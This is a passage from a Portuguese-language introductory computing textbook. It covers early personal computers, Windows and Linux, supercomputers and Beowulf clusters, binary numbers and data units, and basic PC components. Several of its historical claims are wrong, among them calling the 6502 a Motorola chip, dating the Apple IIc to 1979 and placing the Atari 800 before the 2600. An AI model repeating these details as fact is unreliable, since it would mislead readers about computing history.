sões mais poderosas. Ele usava um processador da Motorola, o
6502, que operava a apenas 1 MHz. Em termos de poder de proces-
samento ele perdia para o 8080, mas tinha algumas vantagens a
nível de flexibilidade. O Apple I vinha com 4 KB de memória e saídas
para teclado, terminal de vídeo e para uma unidade de fita. Existia
também um conector reservado para expansões futuras.

Naquela época, as fitas K7 eram o meio mais usado para guardar


dados e programas. Os disquetes já existiam, mas eram muito caros.
O grande problema das fitas K7 era a lentidão, tanto para ler quanto
para gravar e a baixíssima confiabilidade. Isso fora o fato das fitas se
desgastarem com o tempo... Realmente eram tempos difíceis.

Este primeiro modelo foi logo aperfeiçoado, surgindo então o Apple II.
Este sim fez um certo sucesso, apesar do preço salgado para a épo-
ca, US$ 1.298, que equivalem a quase 9.000 reais em valores corri-
gidos.

26
O Apple II vinha com 4 KB de memória, como o primeiro modelo, a
novidade foi uma ROM de 12 KB, que armazenava uma versão da
Basic. A memória RAM podia ser expandida até 52 KB, pois o pro-
cessador Motorola 6502 era capaz de endereçar apenas 64 KB de
memória, e 12 KB já correspondiam à ROM embutida. Um dos “ma-
cetes” naquela época era uma placa de expansão, fabricada pela
Microsoft, que permitia desabilitar a ROM e usar 64 KB completos de
memória. O Apple II já era bem mais parecido com um computador
atual, já vinha com teclado e usava uma TV como monitor. O apare-
lho já vinha com uma unidade de fita K7, mas era possível adquirir
separadamente uma unidade de disquetes. Uma variação do Apple II,
o Apple IIc, lançado em 1979, é considerado por muitos o primeiro
computador portátil da história, pois tinha até um monitor de LCD
como opcional.

Em 1979 surgiu um outro modelo interessante, desta vez da Sinclair,


o ZX-80. Este não era tão poderoso quanto o Apple II, mas tinha a
vantagem de custar apenas 99 dólares (pouco mais de 400 reais em
valores corrigidos) Foi provavelmente o primeiro computador popular
da história. O processador era um Z80, da Zilog, que operava a ape-
nas 1 MHz. A memória RAM também era algo minúsculo, apenas 1
KB, combinados com 4 KB de memória ROM que armazenavam o
Basic, usado pelo aparelho. Como em qualquer sistema popular da
época, os programas eram armazenados em fitas K7.

Considerando preço, o Z80 foi uma máquina surpreendente, mas


claro, tinha pesadas limitações, mesmo se comparado com outras
máquinas da época. Apesar dele já vir com uma saída de vídeo, a
resolução gráfica era de apenas 64x48, mesmo em modo monocro-
mático, já que o adaptador de vídeo tinha apenas 386 bytes de me-
mória. Existia também um modo texto, com 32 x 24 caracteres.

Outro que não poderia deixar de ser citado é o Atari 800. Apesar de
ser mais vendido como um videogame, o Atari 800 também podia ser
usado com um computador relativamente poderoso, chegou a ser
usado em algumas universidades. Ele foi o antecessor do Atari 2600,
conhecido por aqui.

27
Ele vinha de fábrica com 16 KB de memória RAM, que podiam ser
expandidos para até 48 KB, com mais 10 KB de memória ROM. O
sistema operacional era o Atari-OS, uma versão do Basic.

Originalmente, o sistema vinha apenas com a entrada para os cartu-


chos, com o sistema operacional ou jogos, mas era possível adquirir
separadamente uma unidade de disquetes e um teclado, que o trans-
formavam num computador completo. Não existiram muitos progra-
mas para o Atari, o foco foram sempre os jogos, o principal uso do
Atari como computador era de poder programar em Basic, por isso
seu uso em escolas.

A década de 80

Como profetizado por Gordon Moore, os processadores vem dobran-


do de desempenho a cada 18 meses desde o início da década de 70.
Uma década é uma verdadeira eternidade dentro do mercado de
informática, o suficiente para revoluções acontecerem e serem es-
quecidas.

Depois dos “dinossauros” da década de 70, os computadores pesso-


ais finalmente começaram a atingir um nível de desenvolvimento sufi-
ciente para permitir o uso de aplicativos sérios. Surgiram então os
primeiros aplicativos de processamento de texto, planilhas, e até
mesmo programas de editoração e desenho.

O primeiro PC foi lançado pela IBM em 1981 e tinha uma configura-


ção bastante modesta, com apenas 64 KB de memória, dois drives de
disquetes de 5¼, um monitor MDA somente texto (existia a opção de
comprar um monitor CGA) e sem disco rígido. O preço também era
salgado, 4000 dólares da época.

Esta configuração era suficiente para rodar o DOS 1.0 e a maioria da


programas da época, que por serem muito pequenos, cabiam em
apenas um disquete e ocupavam pouca memória RAM. Mas, uma
vantagem que existe desde este primeiro PC é a arquitetura aberta,
que permite que vários fabricantes lancem acessórios e placas de
expansão para ele. Foi questão de meses para que começassem a

28
ser vendidos discos rígidos, placas de expansão de memória, placas
de vídeo, etc. de vários fabricantes.

A Apple havia lançado o Apple III poucos meses antes do PC. Os


dois equipamentos bateram de frente, pois disputavam o mesmo
mercado e o Apple III acabou levando a pior, apesar da sua configu-
ração não ficar devendo à do PC e o preço dos dois ser quase o
mesmo. O Apple III vinha com 128 ou 256 KB de memória, depen-
dendo da versão, um processador Synertek 6502A de 2 MHz e drive
de disquetes de 5¼. O grande pecado foi o uso de um barramento de
expansão proprietário, o que limitou as possibilidades de upgrade aos
acessórios oferecidos pela própria Apple, uma característica que
acabou sendo a grande responsável pela supremacia do PC.

Em 1983 a Apple apareceu com uma grande novidade, o Lisa. Em


sua configuração original, o Lisa vinha equipado com um processador
Motorola 68000 de 5 MHz, 1 MB de memória RAM, dois drives de
disquete de 5.25” de 871 KB, HD de 5 MB e um monitor de 12 pole-
gadas, com resolução de 720 x 360. Era uma configuração muito
melhor do que os PCs da época, sem falar que o Lisa já usava uma
interface gráfica bastante elaborada e já contava com uma suíte de
aplicativos de escritório à lá Office. O problema era o preço, 10.000
dólares. Isso em valores da época, em valores corrigidos seria quase
o dobro.

O Lisa era muito caro, por isso novamente não fez muito sucesso,
mas o projeto serviu de base para o Macintosh lançado em 1984.
Este sim fez um grande sucesso, chegando a ameaçar o império dos
PCs. A configuração era compatível com os PCs da época, com um
processador de 8 MHz, 128 KB de memória e um monitor de 9 pole-
gadas. A grande arma do Macintosh era o MacOS 1.0, um sistema
inovador de vários pontos de vista.

Ao contrário do MS-DOS ele já utiliza interface gráfica e mouse, o que


o tornava muito mais fácil de ser operado. O MacOS continuou evolu-
indo e incorporando novos recursos, mas sempre mantendo a mesma
ideia de interface “user friendly”. Por sinal, já estamos na décima ver-
são do MacOS, o MacOS X. Atualmente, é possível rodar as versões

29
antigas do MacOS mesmo num PC, usando emuladores como o
vMac e o SoftMac.

MacOS 1.0

Em 1984 já existia também a primeira versão do Windows, que era


uma opção para os usuários de PCs interessados em rodar uma in-
terface gráfica.

O Windows 1.0 rodava sobre o MS-DOS e podia executar tanto apli-


cativos for Windows quanto os programas para MS-DOS. O problema
era a memória.

Os PCs da época vinham com quantidades muito pequenas de me-


mória RAM e na época ainda não existia a possibilidade de usar me-
mória virtual (que viria a ser suportada apenas a partir do 386).

Para rodar o Windows, era preciso primeiro carregar o MS-DOS. Os


dois juntos já consumiam praticamente toda a memória de um PC
básico da época. Mesmo nos PCs mais parrudos não era possível
rodar muitos aplicativos ao mesmo tempo, novamente por falta de
memória.

Como os aplicativos for Windows eram muito raros na época, poucos


usuários viram necessidade de utilizar o Windows para rodar os
mesmos aplicativos que rodavam (com muito mais memória disponí-

30
vel), no MS-DOS. Sem contar que a versão inicial do Windows era
bastante lenta e tinha vários bugs.

O Windows começou a fazer algum sucesso na versão 2.1, quando


os PCS 286 com 1 MB ou mais de memória já eram comuns. Com
uma configuração mais poderosa, mais memória RAM e mais aplica-
tivos, finalmente começava a fazer sentido rodar o Windows. O sis-
tema ainda tinha vários bugs e travava com frequência, mas alguns
usuários começaram a migrar para ele.

Windows 2.0

O Windows emplacou mesmo a partir da versão 3.1. O Windows 3.1


era relativamente leve, mesmo para os PCs da época e já suportava
o uso de memória virtual, que permitia abrir vários programas, mesmo
que a memória RAM se esgotasse.

Já existiam também vários aplicativos for Windows e os usuários


tinham a opção de voltar para o MS-DOS quando desejassem.

31
Foi nesta época que os PCs começaram a recuperar o terreno perdi-
do para os Macintosh da Apple. Convenhamos, o Windows 3.1 trava-
va com muita frequência, mas tinha muitos aplicativos e os PCs eram
mais baratos que os Macs. Na época começaram a surgir os primei-
ros concorrentes para o Windows, como o OS/2 da IBM.

Desde o início da era PC, a Microsoft e a IBM vinham trabalhando


juntas no desenvolvimento do MS-DOS e outros programas para a
plataforma PC. Mas, em 1990 a IBM e a Microsoft se desentenderam
e cada uma ficou com uma parte do trabalho feito, com o qual tenta-
ram tomar a liderança do mercado de sistemas operacionais.

Alguns brincam que a IBM ficou com a parte que funciona e a Micro-
soft com o resto, mas a verdade é que apesar do OS/2 da IBM ser
tecnicamente muito superior ao Windows 95 da Microsoft, foi o siste-
ma das janelas quem levou a melhor, pois era mais fácil de usar e
contava com a familiaridade dos usuários com o Windows 3.1.

O OS/2 ainda é utilizado por alguns entusiastas e existem até mesmo


movimentos para continuar o desenvolvimento do sistema, mas fal-
tam programas e drivers.

Um sistema muito mais bem sucedido, que começou a ser desenvol-


vido no início da década de 90 é o Linux. O Linux tem a vantagem de
ser um sistema aberto, que atualmente conta com a colaboração de
centenas de milhares de desenvolvedores voluntários espalhados
pelo globo, além do apoio de empresas de peso, como a IBM. Mas,
no começo o sistema era muito mais complicado que as distribuições
atuais e não contava com as interfaces gráficas exuberantes que
temos hoje em dia.

O desenvolvimento do Linux foi gradual, até que houve a explosão do


acesso à Internet em 95, quando o sistema começou a ser usado em
um número cada vez maior de servidores Web, pois era estável e
gratuito. Hoje a Microsoft consegue brigar de igual para igual (pelo
menos em número de usuários), mas no início Linux era sinónimo de
servidor Web.

32
A Microsoft continuou melhorando seu sistema. Foram lançados o
Windows 95, depois o 98 e finalmente ME, com todos os problemas
que conhecemos mas com a boa e velha interface fácil de usar e uma
grande safra de aplicativos que garantiram a popularização destes
sistemas.

Paralelamente, a Microsoft desenvolvia uma família de sistemas Win-


dows destinadas a servidores, o Windows NT, que chegou até a ver-
são 4, antes de ser transformado no Windows 2000.

As duas famílias Windows fundiram-se no Windows XP, um sistema


destinado tanto ao uso doméstico quanto em estações de trabalho e
servidores, e que pode ser considerado um sistema estável (ao con-
trário do Windows 98 e ME) pois é baseado no Windows 2000. Se-
guem-se os Windows: Vista, 7, 8, 8.1 e 10.

Enquanto isso, o Linux continua avançando. Por enquanto o sistema


é usado apenas em 2% dos micros de mesa (fora usuários casuais e
os que mantém Windows e Linux em dual-boot), mas tem a chance
de crescer bastante no futuro, como a ajuda de aplicativos com o
Gimp e o Star Office, que substituem o Photoshop e o Office, mas
isso tudo já é uma outra história.

Sinclair

O Sinclair foi um dos primeiros computadores pessoais e foi muito


famoso na sua época.

33
O Lançamento do Spectrum - O Sinclair/TK85 Spectrum

Em 1982, segundo se conta, o empresário britânico Sir Clive Sinclair


desenvolveu o ZX Spectrum para participar de um concurso promovi-
do pela BBC, que premiaria um computador pessoal de baixo preço e
com apoio no marketing. O vencedor, entretanto, foi outro (o Acorn), e
Sinclair decidiu lançar o seu micro por conta própria, como "sucessor"
de suas espetaculares criações ZX 80 e ZX 81.

Existiam então duas versões disponíveis: 16k e 48k de memória


RAM. Além disso, contava com 16k de ROM, 16 cores, uma revolu-
ção, numa época em que "cor" era sinônimo de videogame, (oito bá-
sicas mais um modo especial para cada uma delas, "Bright On/Off"),
som, gráficos de alta resolução (256x192 pixels) e linguagem BASIC
inclusa, fácil de usar. E tudo isso por apenas 180 libras. Por causa
disso tudo, jogos e aplicativos eram lançados num ritmo surpreenden-
te.

Sir Clive Sinclair

A Ascensão do Spectrum

Em 1983, 200 mil computadores já tinham sido vendidos. No Brasil, a


Microdigital lança um novo micro, o TK85. Era, em poucas palavras,
um ZX 81 com gabinete e teclado exatamente iguais ao ZX Spectrum

34
(isso inclusive gerou um processo judicial). O clone brasileiro do ZX
Spectrum demoraria ainda dois anos para ser lançado, acompanhan-
do a tradição do nosso mercado reservado, muito atrás do resto do
mundo.

Para atender às inúmeras reclamações dos usuários quanto às teclas


de borracha, em 1984 foi lançado o Spectrum+, com um novo teclado
de plástico (que parece ter gerado uma nova onda de reclamações) e
um botão RESET. A Sinclair Research torna-se então campeã de
vendas na Grã - Bretanha.

Em 1985, existiam então naquelas praias seis milhões de usuários,


acompanhando o lançamento do Spectrum 128. Entretanto, nessa
época o mundo toma conhecimento da geração 16 bits, e o declínio
parece inevitável.

Em meados de 1985 a Microdigital lança no Brasil o TK 90X. Custan-


do cerca de 250 dólares no lançamento, chegando a US$ 200 alguns
meses depois, torna-se imediatamente um estrondoso sucesso de
vendas. Era exatamente igual ao ZX Spectrum, com algumas "melho-
rias", como uma interface para joysticks inclusa, um comando para
edição de UDG (User Defined Graphics) e ligação direta com uma
TV. No ano seguinte o mercado brasileiro vê o TK 95, basicamente a
mesma coisa, só que com o teclado e o gabinete mais "robustos",
"copiados" do Commodore C64, um dos concorrentes do ZX Spec-
trum na Grã-Bretanha

O Declínio do Spectrum

Em 1986, Alan Sugar, dono da Amstrad, compra a Sinclair Research


e lança o Sinclair ZX Spectrum 2+ e em seguida o modelo 3+, em
1987, incluindo disk drive de 3" e muitas mudanças na ROM. Em
1988 as vendas de micros de 16 bits ultrapassam as de 8 bits na Grã-
Bretanha. Em 1989 cessa a produção do Spectrum. No Brasil, o de-
clínio também é agudo. O mercado torna-se dividido entre as aplica-
ções sérias com os PCs e os assumidos videogames, os micros
MSX. O TK95 perde cada vez mais espaço, até literalmente desapa-
recer das páginas da mais conceituada publicação da época, a Micro
Sistemas.

35
A Queda do Spectrum

No começo dos anos 90, milhares de usuários continuavam teimosa-


mente editando revistas, programas e acessórios (até um novo Spec-
trum "revolucionário" é lançado, o Sam Coupé). Entretanto, o inevitá-
vel fim da "Era Spectrum" chega, em 1992.

Os supercomputadores

Na década de 40, todos os computadores do mundo eram gigantes-


cos e caros, custando vários milhões de dólares, mas agregando tudo
o que havia mais avançado em termos de conhecimento humano.
Pois bem, vendo de hoje, pode parecer ridículo que qualquer calcula-
dora de mão de 3 reais possa ter um poder de processamento supe-
rior ao de um Eniac, que só de manutenção custava quase 200.000
dólares por dia, mas os supercomputadores continuam existindo, tão
grandes e caros quanto um Eniac, porém incomparavelmente mais
rápidos do que os micros de mesa.

Este trecho final é dedicado a eles, os mastodontes que estão por


trás de muitos dos avanços da humanidade, que apesar de estarem
escondidos em grandes salas refrigeradas são alvo de grande curio-
sidade.

A demanda

Apesar de mesmo um "PC de baixo custo" atualmente possuir um


poder de processamento superior ao de um supercomputador que a
mais de 25 anos atrás custava 5 milhões de dólares, a demanda por
sistemas casa vez mais rápidos continua.

As aplicações são várias, englobando principalmente pesquisas cien-


tíficas, aplicações militares diversas, e vários tipos de aplicativos fi-
nanceiros e relacionados à Internet, aplicativos que envolvem uma
quantidade absurda de processamento, e claro, envolvem instituições
que podem pagar muito mais do que 5 ou 10 mil dólares por um com-
putador o mais rápido possível.

36
Existindo demanda... aparecem os fornecedores.

As soluções

Atualmente, todos os supercomputadores são construídos com base,


praticamente, nos mesmos componentes que temos em micros de
mesa, memória, HDs, e processadores, Intel, IBM e em alguns casos
também chips Athlon. A diferença é que vários processadores, HDs e
módulos de memória são combinados para criar um sistema incrivel-
mente rápido.

Ao invés de usar apenas um disco rígido IDE, SATA ou SSD, como


num micro de mesa, um supercomputador utiliza um array de cente-
nas de HDs, sistemas semelhantes ao RAID, mas numa escala mai-
or, que permitem gravar dados de forma fragmentada em vários dis-
cos e ler os pedaços simultaneamente a partir de vários HDs, obten-
do taxas de transferência muito altas. A capacidade total de armaze-
namento de um supercomputador já é medida na casa dos PeTa-
bytes, o IBM ASCI White, que é considerado o supercomputador mais
poderoso (final de 2001) tem 160 Terabytes de armazenamento em
disco.

Processadores e memória RAM geralmente são agrupados em nós,


cada nó engloba de um a quatro processadores e uma certa quanti-
dade de memória RAM e cache. Isso garante que os processadores
tenham um acesso à memória tão rápido quanto um PC de mesa. Os
nós por sua vez são interligados através de algum tipo de barramento
ultra rápido, o que os torna partes do mesmo sistema de processa-
mento. Como neurônios interligados para formar um cérebro. Um nó
sozinho não tem uma capacidade de processamento tão surpreen-
dente assim, mas ao interligar algumas centenas, ou milhares de nós
a coisa muda de figura.

Os processadores mais utilizados eram os processadores Pentium III


ou chips IBM Power 3, (produzidos especialmente para esta tarefa),
entre algumas outras opções. Os processadores Athlon não eram os
preferidos da indústria neste segmento, pois apresentam uma dissi-
pação de calor bem mais alta que os chips Intel e IBM, o que torna-se
um problema grave ao usar vários chips dentro do mesmo gabinete.

37
Se em um micro doméstico já é preciso um bom cooler e uma boa
ventilação do gabinete para usar apenas um chip Athlon, imagine o
problemão que é juntar 200 ou 500 destes chips.

Algumas empresas cogitavam no uso de chips Crusoé, o que faz


sentido, já que apesar do baixo desempenho, estes chips consomem
pouca eletricidade e geram pouco calor, um Crusoé sozinho tem um
desempenho muito abaixo do de um Pentium III, mas se for possível
usar mais chips Crusoé na mesma máquina, a maior quantidade pode
compensar o menor desempenho por cabeça.

Modelos

Como disse a pouco, o supercomputador mais poderoso da atualida-


de é o IBM ASCI White. Ele possui nada menos que 8192 processa-
dores IBM Power 3 de 375 MHz com filamentos de cobre. A baixa
frequência de operação dos processadores é justificada pela neces-
sidade de uma estabilidade irretocável e baixa dissipação de calor. O
supercomputador tem um poder de processamento estimado em 12.3
teraflops, uma potência mais de mil vezes superior à de qualquer PC
top de linha atual. Completando, temos 6 Terabytes de memória RAM
e um total de 160 Terabytes de armazenamento em disco. Em com-
pensação o sistema é simplesmente gigantesco, ocupando uma área
equivalente à de duas quadras de basquete.

Outro sistema bastante poderoso é o ASCI Blue-Pacific, formado por


1296 nós, de 4 processadores cada, totalizando 5856 processadores
PowerPC604e de 332 MHz em paralelo. 423 dos nós tem 2.5 GB de
memória RAM cada, e os demais tem 1.5 GB cada, totalizando 2.6
Terabytes no total.

A capacidade de armazenamento em disco fica em 62.3 Terabytes. A


velocidade total de acesso a disco chega a 10.5 GB/s, quase mil ve-
zes o que temos num micro de mesa. Esse aparato todo é dividido
em 162 gabinetes ligados entre si, que também ocupam a área de
duas quadras de basquete.

38
Sistemas como estes são extremamente poderosos, o problema é
que são incrivelmente caros, custando dezenas de milhões de dóla-
res. Tanto o ASCI White, quanto o ASCI Blue-Pacific são únicos e
existem no mundo apenas mais alguns poucos supercomputadores
com uma potência próxima à mostrada por eles.

Uma opção mais barata para uma companhia que precisa de um


supercomputador, mas não tem tanto dinheiro assim disponível é
usar um sistema de processamento distribuído, ou cluster. Um cluster
formado por vários PCs comuns ligados em rede. Em muitos casos
sequer é preciso que os PCs tenham uma configuração idêntica, e a
conexão pode ser feita através de uma rede Ethernet 10/100, ou
mesmo através da Internet.

O exemplo mais famoso de processamento distribuído foi o projeto


Seti@Home, onde cada voluntário instalava um pequeno programa
que utilizava os ciclos de processamento ociosos da máquina para
processar as informações relacionadas ao projeto.

Os pacotes de dados de 300 KB cada chegavam pela Internet e de-


moravam várias horas para serem processados. Isso permitiu que
mais de 2 milhões de pessoas, muitas com conexão via modem parti-
cipassem do projeto. O sistema montado pela Seti@Home é conside-
rado por muitos o supercomputador mais poderoso do mundo.

Este tipo de sistema pode ser construído usando por exemplo a rede
interna de uma empresa. Rodando o software adequado, todos os
micros podem fazer parte do sistema, alcançando juntos um poder de
processamento equivalente ao de um supercomputador. O mais inte-
ressante é que estes PCs poderiam ser usados normalmente pelos
funcionários, já que o programa rodaria utilizando apenas os ciclos
ociosos do processador.

A tecnologia de cluster mais usada atualmente são clusters Beowulf,


formados por vários computadores interligados em rede. Não é ne-
cessário nenhum hardware sofisticado, um grupo de PCs de configu-
ração mediana ligados através de uma rede Ethernet de 100 mega-
bits já são o suficiente para montar um cluster beowulf capaz de riva-
lizar com muitos supercomputadores em poder de processamento. A

39
ideia é criar um sistema de baixo custo, que possa ser utilizado por
universidades e pesquisadores com poucos recursos.

O primeiro cluster beowulf foi criado em 1994 na CESDIS, uma sub-


sidiária da NASA e era formado por 16 PCs 486 DX-100 ligados em
rede. Para manter a independência do sistema e baixar os custos, os
desenvolvedores optaram por utilizar o Linux.

Estes clusters não servem para processar dados em tempo real (um
game qualquer por exemplo), mas apenas para processar grandes
quantidades de dados, que podem ser quebrados em pequenas par-
tes e divididos entre os vários computadores. Uma área onde são
populares é na aplicação de efeitos especiais e renderização de ima-
gens para filmes de cinema. Há inclusive casos de filmes como Shrek
e Final Fantasy que foram feitos inteiramente em clusters beowulf.

A história

Os primeiros supercomputadores começaram a surgir na década de


60, alias uma década de muitos avanços, já que no final da década
de 50 foi feita a transição das válvulas para os transístores. Cada
transístor era centenas de vezes menor que uma válvula, era muito
mais durável e tinha a vantagem de gerar pouco calor.

Todos os computadores da década de 60 já utilizavam transístores, o


que permitiu o desenvolvimento dos primeiros minicomputadores.
Naquela época, minicomputador era qualquer coisa do tamanho de
um armário, com uma capacidade de processamento inferior ao de
uma agenda eletrônica atual, e das mais baratinhas.

Os computadores de grande porte, porém, continuaram a ser desen-


volvidos, passando a ser chamados de supercomputadores. O primei-
ro supercomputador para fins comerciais foi o CDC 6600, que foi
seguido pelos IBM 360/95 e 370/195.

Na década de 70 surgiu uma nova revolução, os microchips, forma-


dos por alguns milhares de transístores. Um microchip sozinho ofere-
cia uma capacidade de processamento equivalente à de um mini-

40
computador, mas em compensação era escandalosamente menor e
mais barato. Surgiram então os primeiros microcomputadores.

Os supercomputadores da década de 70 já eram centenas de vezes


mais poderosos do que os produzidos uma década antes, os princi-
pais modelos foram o CDC 7600, o BSP, produzido pela Burroughs e
o ASC da Texas Instruments.

Estes sistemas atingiram a marca de 100 megaflops, ou seja, 100


milhões de cálculos de ponto flutuante por segundo. Esta é a mesma
capacidade de processamento de um Pentium 60, a diferença é que o
Pentium surgiu quase 20 anos mais tarde.

No final da década de 70 sugiram os supercomputadores Cray, pro-


duzidos pela Seymour. O primeiro da linha, chamado de Cray 1 pro-
cessava 100 megaflops, porém o Cray-XMP atingiu a incrível marca
de 1 Gigaflop, no início da década de 80. Esta é uma capacidade de
processamento próxima à de um Pentium II 350.

Os supercomputadores desta época foram usados principalmente na


corrida espacial, aliás eles foram os principais responsáveis pelo su-
cesso do programa espacial Americano sobre o Russo.

Uma viagem espacial demanda um número absurdo de cálculos. Os


Americanos tinham computadores melhores que os Russos, o que
antecipava seus lançamentos.

Como tudo funciona

Para um leigo, um computador pode até parecer uma máquina miste-


riosa, uma “caixa preta” onde de alguma forma mística são guardadas
e processadas informações. Mas, de misterioso os computadores não
têm nada. Tudo funciona de maneira ordenada, e até certo ponto,
simples.

Hoje em dia, quase todo mundo com condições para pagar um curso,
ou ter um PC em casa, aprende muito rápido como usar o Windows
ou mesmo o Linux, acessar a Internet, ou seja, usar o micro. Mas,
dentre todos estes usuários, poucos, muito poucos realmente enten-

41
dem como a máquina funciona. O que muda entre um processador
Pentium ou um Athlon por exemplo? Por que um PC com pouca me-
mória RAM fica lento? Como funciona um disco rígido, e como é pos-
sível armazenar uma quantidade tão grande de dados num dispositi-
vo tão pequeno? O que fazem as placas de vídeo 3D e em que tare-
fas elas são necessárias? Qual é a diferença entre uma placa de som
“genérica” e outra que custa mais de 200 dólares? Por que alguns
modems são tão ruins?

Como um PC funciona??

O objetivo deste texto introdutório é lhe dar uma visão geral sobre os
componentes que formam um computador atual e como tudo funcio-
na. Você encontrará também várias dicas de compra, explicações
sobre termos e convenções usadas, etc. O objetivo é servir como “o
caminho das pedras” para quem está começando a estudar hardwa-
re, e precisa de um empurrãozinho inicial para poder estudar tópicos
mais avançados.

Como funciona o sistema binário?

Existem duas maneiras de representar uma informação: analogica-


mente ou digitalmente. Uma música é gravada numa fita K-7 de forma
analógica, codificada na forma de uma grande onda de sinais magné-
ticos, que pode assumir um número ilimitado de frequências. Um som
grave seria representado por um ponto mais baixo da onda, enquanto
um ponto mais alto representaria um som agudo. O problema com
esta representação, é que qualquer interferência causa distorções no
som.

Se os computadores trabalhassem com dados analógicos, certamen-


te seriam muito passíveis de erros, pois qualquer interferência, por
mínima que fosse, causaria alterações nos dados processados e
consequentemente nos resultados.

O sistema digital por sua vez, permite armazenar qualquer informa-


ção na forma de uma sequência de valores positivos e negativos, ou
seja, na forma de uns (1) e zeros (0). O número 181 por exemplo,
pode ser representado digitalmente como 10110101.

42
Veja o exemplo na tabela abaixo:

1024 512 256 128 64 32 16 8 4 2 1


1 0 1 1 0 1 0 1

No exemplo, devemos tomar sempre o número menor mais próximo


para ser deduzido. Os números utilizados na dedução serão classifi-
cados na tabela com o número (1) e os outros com o (0).

181 - 128 = 53 Os números 128, 32, 16, 4 e 1 rece-


53 - 32 = 21 bem um sinal elétrico positivo, repre-
21 - 16 = 5
sentado por (1), e os números 64, 8, e
5 - 4 = 1
1 - 1 = 0 2 não recebem sinal elétrico, repre-
sentados por (0).
Somando os números identificados com o número (1) na tabela:

128+32+16+4+1=181.

Qualquer tipo de dado, seja um texto, uma imagem, um vídeo, um


programa, ou qualquer outra coisa, será processado e armazenado
na forma de uma grande sequência de uns e zeros.

É justamente o uso do sistema binário que torna os computadores


confiáveis, pois a possibilidade de um valor 1 ser alterado para um
valor 0, ou o oposto, é muito pequena. Lidando com apenas dois va-
lores diferentes, a velocidade de processamento também torna-se
maior, devido à simplicidade dos cálculos.

Cada valor binário é chamado de “bit”, contração de “binary digit” ou


“dígito binário”. Um conjunto de 8 bits forma um byte, e um conjunto
de 1024 bytes forma um Kilobyte (ou Kbyte). O número 1024 foi esco-
lhido pois é a potência de 2 mais próxima de 1000. Um conjunto de
1024 Kbytes forma um Megabyte (1.048,576 bytes) e um conjunto de
1024 Megabytes forma um Gigabyte (1073741824 bytes). Os próxi-
mos múltiplos são o Terabyte (1024 Gibabytes) e o Petabyte (1024
Terabytes). Segue-se o Exabyte, Zettabyte e o Yottabyte.

43
Também usamos os termos Kbit, Megabit e Gigabit, para representar
conjuntos de 1024 bits.

Como um byte corresponde a 8 bits, um Megabyte corresponde a 8


Megabits e assim por diante.

1 Bit = 1 ou 0
1 Byte = Um conjunto de 8 bits
1 Kbyte = 1024 bytes ou 8192 bits
1 Megabyte = 1024 Kbytes, 1.048.576 bytes ou 8.388.608 bits
1 Gigabyte = 1024 Megabytes, 1.048.576 Kbytes, 1.073.741.824
bytes ou 8.589.934.592 bits.

Seguem-se as terminologias:
Terabyte – desde 1960
Petabyte – desde 1975
Exabyte – desde 1975
Zettabyte – desde 1991
Yottabyte – desde 1991

O sistema numérico foi introduzido em 1795 com seis prefixos. As


outras datas estão relacionadas ao reconhecimento pela resolução da
Conferência Geral de Pesos e Medidas (CGPM).

Quando vamos abreviar, também existe diferença. Quando estamos


falando de Kbytes (kilobyte) ou Megabytes, abreviamos respectiva-
mente como KB e MB, sempre com o “B” maiúsculo. Quando esta-
mos falando de Kbits (kilobits) ou Megabits abreviamos da mesma
forma, porém usando o “B” minúsculo, “Kb”, “Mb” e assim por diante.
Parece irrelevante, mas esta é uma fonte de muitas confusões. Sem-
pre que nos referimos à velocidade de uma rede de computadores,
por exemplo, não a medimos em bytes por segundo, e sim em bits
por segundo: 10 megabits, 100 megabits e assim por diante. Escrever
“100 MB” neste caso, daria a entender que a rede transmite a 100
megabytes, que correspondem a 800 megabits.

A arquitetura básica de qualquer computador completo, seja um PC,


um Macintosh ou mesmo um computador de grande porte, é formada

44
por apenas 5 componentes básicos: processador, memória RAM,
disco rígido, dispositivos de entrada e saída e softwares.
O processador é o cérebro do sistema, encarregado de processar
todas as informações. Porém, apesar de toda sua sofisticação, o pro-
cessador não pode fazer nada sozinho. Para termos um computador
funcional, precisamos de mais alguns componentes de apoio: memó-
ria, unidades de disco, dispositivos de entrada e saída e finalmente,
os programas a serem executados.

A memória principal, ou memória RAM, é usada pelo processador


para armazenar os dados que estão sendo processados, funcionando
como uma espécie de mesa de trabalho. A quantidade de memória
RAM disponível, determina quais atividades o processador poderá
executar. Um engenheiro não pode desenhar a planta de um edifício
sobre uma carteira de escola. Caso a quantidade de memória RAM
disponível seja insuficiente, o computador não será capaz de rodar
aplicativos mais complexos. O IBM PC original, lançado em 1981, por
exemplo, possuía apenas 64 Kbytes de memória e por isso era capaz
de executar apenas programas muito simples, baseados em texto.
Um PC atual possui bem mais memória: 4 GB, 8 GB ou mais, por isso
é capaz de executar programas complexos.

A memória RAM é capaz de responder às solicitações do processa-


dor numa velocidade muito alta. Seria perfeita se não fossem dois
problemas: o alto preço e o fato de ser volátil, ou seja, de perder to-
dos os dados gravados quando desligamos o micro.

Já que a memória RAM serve apenas como um rascunho, usamos


um outro tipo de memória para guardar arquivos e programas: a me-
mória de massa. O principal dispositivo de memória de massa é o
disco rígido, onde ficam guardados programas e dados enquanto
não estão em uso ou quando o micro é desligado. Disquetes, Pendri-
vers, CD-ROMs e DVD-ROMs também são ilustres representantes
desta categoria de memória.

Para compreender a diferença entre a memória RAM e a memória de


massa, você pode imaginar uma lousa e uma estante cheia de livros
com vários problemas a serem resolvidos. Depois de ler nos livros
(memória de massa) os problemas a serem resolvidos, o processador

45
usaria a lousa (a memória RAM) para resolvê-los. Assim que um pro-
blema é resolvido, o resultado é anotado no livro, e a lousa é apaga-
da para que um novo problema possa ser resolvido. Ambos os dispo-
sitivos são igualmente necessários.

Os sistemas operacionais atuais, incluindo claro a família Windows,


permitem ao processador usar o disco rígido para gravar dados caso
a memória RAM se esgote, recurso chamado de memória virtual.
Utilizando este recurso, mesmo que a memória RAM esteja comple-
tamente ocupada, o programa será executado, porém muito lenta-
mente, devido à lentidão do disco rígido.

Para permitir a comunicação entre o processador e os demais com-


ponentes do micro, assim como entre o micro e o usuário, temos os
dispositivos de I/O “input/output” ou “entrada e saída”.

Estes são os olhos, ouvidos e boca do processador, por onde ele


recebe e transmite informações.

Existem duas categorias de dispositivos de entrada e saída:

A primeira é composta pelos dispositivos destinados a fazer a comu-


nicação entre o usuário e o micro. Nesta categoria podemos enqua-
drar o teclado, mouse, microfone, etc. (para a entrada de dados), o
monitor, impressoras, caixas de som, etc. (para a saída de dados).
A segunda categoria é destinada a permitir a comunicação entre o
processador e os demais componentes internos do micro, como a
memória RAM e o disco rígido. Os dispositivos que fazem parte desta
categoria estão dispostos basicamente na placa mãe, e incluem con-
